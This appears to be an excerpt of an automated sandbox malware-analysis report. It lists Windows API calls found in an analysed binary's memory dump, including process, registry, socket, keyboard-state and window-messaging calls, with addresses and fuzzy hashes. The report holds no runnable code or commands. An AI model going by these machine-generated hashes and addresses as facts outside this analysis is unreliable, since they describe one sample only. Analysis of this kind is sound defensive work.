                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                    • String ID: D=n
                                                                    • API String ID: 3277943733-1211169007
                                                                    • Opcode ID: c2499469cc380de31830905f49686e6d8486ff13d68762e45091fbf49154a582
                                                                    • Instruction ID: 460ee0e26adf17a6bff0c29ada93da6953ccc851e3ce6cc6e1bbea7ea21398aa
                                                                    • Opcode Fuzzy Hash: c2499469cc380de31830905f49686e6d8486ff13d68762e45091fbf49154a582
                                                                    • Instruction Fuzzy Hash: F9F05EF1540364BAF3102B61AC89F777E5FDF05754F005421BF09DB2A2D7759E108AA8
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006819F3
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00681A26
                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00681B49
                                                                    • CloseHandle.KERNEL32(?), ref: 00681BBF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                    • String ID:
                                                                    • API String ID: 2364364464-0
                                                                    • Opcode ID: f367b668e9bac8bd2345b032b5ebd98e878058b2256a849f403facb74e704bcc
                                                                    • Instruction ID: 88bcd6e4c4e461635c86783798b1ccfdea3a015f527f28bfd98b19d9ec889756
                                                                    • Opcode Fuzzy Hash: f367b668e9bac8bd2345b032b5ebd98e878058b2256a849f403facb74e704bcc
                                                                    • Instruction Fuzzy Hash: F8819070600215ABDF50AF64C896BADBBEAFF09720F148459F905AF382D7B4AD41CF94
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0068E1D5
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0068E20D
                                                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 0068E248
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0068E269
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0068E281
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                                                    • String ID:
                                                                    • API String ID: 3188977179-0
                                                                    • Opcode ID: 89a057afd116daa9f7ed435255c7a05204d781c17222d19ea6c849e6e19321d3
                                                                    • Instruction ID: 90b6e846cee79c37f68937d1e5d556a0adf06e5f519ccc7968c4268072cf9009
                                                                    • Opcode Fuzzy Hash: 89a057afd116daa9f7ed435255c7a05204d781c17222d19ea6c849e6e19321d3
                                                                    • Instruction Fuzzy Hash: C661A434A00644AFDB24EF54C895FEA77BBEF8A300F144659F9999B3A1C772A950CB10
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00661CB4
                                                                    • VariantClear.OLEAUT32(00000013), ref: 00661D26
                                                                    • VariantClear.OLEAUT32(00000000), ref: 00661D81
                                                                    • VariantClear.OLEAUT32(?), ref: 00661DF8
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00661E26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                    • String ID:
                                                                    • API String ID: 4136290138-0
                                                                    • Opcode ID: 10e225a822e5b1bc51ee9f336b1548282a3e8de687971ef35bdc5da84e2460f1
                                                                    • Instruction ID: e4f30634af7ecc780e20a7818d8586c7765ce10ebd9ff0d6aa7fa64437dd6dca
                                                                    • Opcode Fuzzy Hash: 10e225a822e5b1bc51ee9f336b1548282a3e8de687971ef35bdc5da84e2460f1
                                                                    • Instruction Fuzzy Hash: BA513AB5A00209EFDB14CF58C880AAAB7F9FF8D314B158559E959DB311D730E951CFA0
                                                                    APIs
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006806EE
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0068077D
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0068079B
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 006807E1
                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 006807FB
                                                                      • Part of subcall function 0063E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0066A574,?,?,00000000,00000008), ref: 0063E675
                                                                      • Part of subcall function 0063E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0066A574,?,?,00000000,00000008), ref: 0063E699
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 327935632-0
                                                                    • Opcode ID: fc308059ec266aa19afd9fbbecab05f3afcdba14d9cc7b3fd398b6116e59a650
                                                                    • Instruction ID: 8b46e89eabf0d1205c4f88ddf0af7577ee413e1077aab2e17fc27b20f871e828
                                                                    • Opcode Fuzzy Hash: fc308059ec266aa19afd9fbbecab05f3afcdba14d9cc7b3fd398b6116e59a650
                                                                    • Instruction Fuzzy Hash: 95516775A00615DFDB40EFA8C8819EDB7B6BF49310B048159EA16AB352DB30ED46CF94
                                                                    APIs
                                                                      • Part of subcall function 00683C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00682EEF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00682F2E
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00682F75
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00682FA1
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00682FAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 3740051246-0
                                                                    • Opcode ID: 5d909fc4da2516c6c6be7b8fc5bf1fcdf01982f4edccdf57d10ec460e6a49f74
                                                                    • Instruction ID: b94e40f0bb1061d2db25e2d3631780a4167ff027e2264885e6e550800487f8b5
                                                                    • Opcode Fuzzy Hash: 5d909fc4da2516c6c6be7b8fc5bf1fcdf01982f4edccdf57d10ec460e6a49f74
                                                                    • Instruction Fuzzy Hash: EC515871208205AFC744EF64C891EAEB7FABF88314F00891DF696972A1DB30E905CF56
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 78a7f161333f0a7bb903b8466b6294e79e261f77c3fe3cbb444fff5899ed2449
                                                                    • Instruction ID: ec377f71f8d1305b4bc712ab4b5dcaaf3a6e86e62fca6f967e46928de84c75f7
                                                                    • Opcode Fuzzy Hash: 78a7f161333f0a7bb903b8466b6294e79e261f77c3fe3cbb444fff5899ed2449
                                                                    • Instruction Fuzzy Hash: 5D41A439900214AFC710FB68CC48FE97F66EF0A320F141365F95AA72D1C670AD41DB60
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006712B4
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006712DD
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0067131C
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00671341
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00671349
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1389676194-0
                                                                    • Opcode ID: ec34c3093845f7b2f95b8eca51c5bb43c294af44eb529a5b6fd5ec6b3fd1e832
                                                                    • Instruction ID: f40e06c71ed0966dbd3990f8a12881a8ddd4fd9bf4a2d0271cd3348a4144948b
                                                                    • Opcode Fuzzy Hash: ec34c3093845f7b2f95b8eca51c5bb43c294af44eb529a5b6fd5ec6b3fd1e832
                                                                    • Instruction Fuzzy Hash: A1410B35A00515DFCB41EF64C981AADBBF6FF49310B148099E90AAB362CB31ED41DF64
                                                                    APIs
                                                                    • GetCursorPos.USER32(000000FF), ref: 0063B64F
                                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0063B66C
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 0063B691
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0063B69F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 0ccef1cfba7007f88829d18ad5b7971e06d3e7f2d4ed2d79439772097f99f965
                                                                    • Instruction ID: 966e598d9502c92998e8e5327a63f5ce7a89a924ba70639ffa11a0058e3cf018
                                                                    • Opcode Fuzzy Hash: 0ccef1cfba7007f88829d18ad5b7971e06d3e7f2d4ed2d79439772097f99f965
                                                                    • Instruction Fuzzy Hash: 1C417F35A04119FFCF159F64C845AEDBBB6FB06324F104329F82A96291CB30AD94DFA1
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 0065B369
                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0065B413
                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0065B41B
                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0065B429
                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0065B431
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 4ba1fa680bba092a869d1950eec03a0997ea3ed7e0869b3b4af646c81e4fee0c
                                                                    • Instruction ID: 425af2e33369c235c9589dd2deecf0f3e7734d8512e00be798b4fd87fd20f7a5
                                                                    • Opcode Fuzzy Hash: 4ba1fa680bba092a869d1950eec03a0997ea3ed7e0869b3b4af646c81e4fee0c
                                                                    • Instruction Fuzzy Hash: 8F31AE71900219EBDF14DF68D94DADE7BB6EB05316F105229F921AA2D1C3B0AD58CF90
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0065DBD7
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0065DBF4
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0065DC2C
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0065DC52
                                                                    • _wcsstr.LIBCMT ref: 0065DC5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 3902887630-0
                                                                    • Opcode ID: 4bc6313b76505bd81623a1f917ad4e2a38db289d8ab38c856a6f4c38a76d60d5
                                                                    • Instruction ID: a5c0d879a9aa2db994326f2410750f9af2ba108a374c0565e58fa72301b31b3c
                                                                    • Opcode Fuzzy Hash: 4bc6313b76505bd81623a1f917ad4e2a38db289d8ab38c856a6f4c38a76d60d5
                                                                    • Instruction Fuzzy Hash: 14210771204100BBEB259F399C49EBF7BAEDF46761F10403DFC0ACA191EAA1DC45D6A4
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0065BC90
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0065BCC2
                                                                    • __itow.LIBCMT ref: 0065BCDA
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0065BD00
                                                                    • __itow.LIBCMT ref: 0065BD11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: 82f3d0f7a01a03c0b76b647727a7bcfd908bcd7d4c247a140ba561461b9ba0a3
                                                                    • Instruction ID: 70a1f0b2add5b2ddfbeac3c2ec17aeee2c5829852176c04999426bd13d517ecf
                                                                    • Opcode Fuzzy Hash: 82f3d0f7a01a03c0b76b647727a7bcfd908bcd7d4c247a140ba561461b9ba0a3
                                                                    • Instruction Fuzzy Hash: 4F210B716006187BDB10AF649C46FDE7B7BEF4A351F002029FD06EB181DB70894987A5
                                                                    APIs
                                                                      • Part of subcall function 006250E6: _wcsncpy.LIBCMT ref: 006250FA
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,006660C3), ref: 00666369
                                                                    • GetLastError.KERNEL32(?,?,?,006660C3), ref: 00666374
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006660C3), ref: 00666388
                                                                    • _wcsrchr.LIBCMT ref: 006663AA
                                                                      • Part of subcall function 00666318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006660C3), ref: 006663E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                    • String ID:
                                                                    • API String ID: 3633006590-0
                                                                    • Opcode ID: cd4b316fc5d8166591c67816f8beabf4bea572bacf9430463d6d8501cdb2826a
                                                                    • Instruction ID: 9e9be6b75046bf07412f374ebc39f9a8c53adf56bb11c9937f7a06f803f56b78
                                                                    • Opcode Fuzzy Hash: cd4b316fc5d8166591c67816f8beabf4bea572bacf9430463d6d8501cdb2826a
                                                                    • Instruction Fuzzy Hash: 902108319042159BDB11AB74FC52FEA33AEEF163A0F102069F006E73C0EF60DD818A59
                                                                    APIs
                                                                      • Part of subcall function 0067A82C: inet_addr.WSOCK32(00000000), ref: 0067A84E
                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00678BD3
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00678BE2
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00678BFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 3701255441-0
                                                                    • Opcode ID: 041a5ec2282e2898c14f509e823a5c1a49f62d7bd495328c82952c5d9bcb4584
                                                                    • Instruction ID: 132ba53bd3e99767168cc03a379e1765583dbb85cca12dce4cb5004e148aa448
                                                                    • Opcode Fuzzy Hash: 041a5ec2282e2898c14f509e823a5c1a49f62d7bd495328c82952c5d9bcb4584
                                                                    • Instruction Fuzzy Hash: 3621AE312002149FCB54AF68C989B7E77AAAF49720F04944DF946AB392CB74EC018B65
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00678441
                                                                    • GetForegroundWindow.USER32 ref: 00678458
                                                                    • GetDC.USER32(00000000), ref: 00678494
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 006784A0
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 006784DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: e08d20425cbd62bceb847a441d71b4889c4c826041b2782d93d288477335eca6
                                                                    • Instruction ID: be76b59a480575bc7f81b7238a3aa23cb6d3000b8e351cb4b3800a0fad110056
                                                                    • Opcode Fuzzy Hash: e08d20425cbd62bceb847a441d71b4889c4c826041b2782d93d288477335eca6
                                                                    • Instruction Fuzzy Hash: EC219F75A00204AFD740EFA4D888AAEBBE6EF49341F04C47DF84AD7651CA70BD40CB60
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0063AFE3
                                                                    • SelectObject.GDI32(?,00000000), ref: 0063AFF2
                                                                    • BeginPath.GDI32(?), ref: 0063B009
                                                                    • SelectObject.GDI32(?,00000000), ref: 0063B033
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: 08558908f1b57deeb778f9dca338e62dab276f52a789a13cea27d0902b69c676
                                                                    • Instruction ID: 960d9e0672fe34973a4a6436bdac04aae1d9a059342366afc97de0415f128b8e
                                                                    • Opcode Fuzzy Hash: 08558908f1b57deeb778f9dca338e62dab276f52a789a13cea27d0902b69c676
                                                                    • Instruction Fuzzy Hash: C0218370800385EFDB10EF55EC84BDE7B6BBB12355F18631AE5259E2A0C3705A51EF91
                                                                    APIs
                                                                    • __calloc_crt.LIBCMT ref: 006421A9
                                                                    • CreateThread.KERNEL32(?,?,006422DF,00000000,?,?), ref: 006421ED
                                                                    • GetLastError.KERNEL32 ref: 006421F7
                                                                    • _free.LIBCMT ref: 00642200
                                                                    • __dosmaperr.LIBCMT ref: 0064220B
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
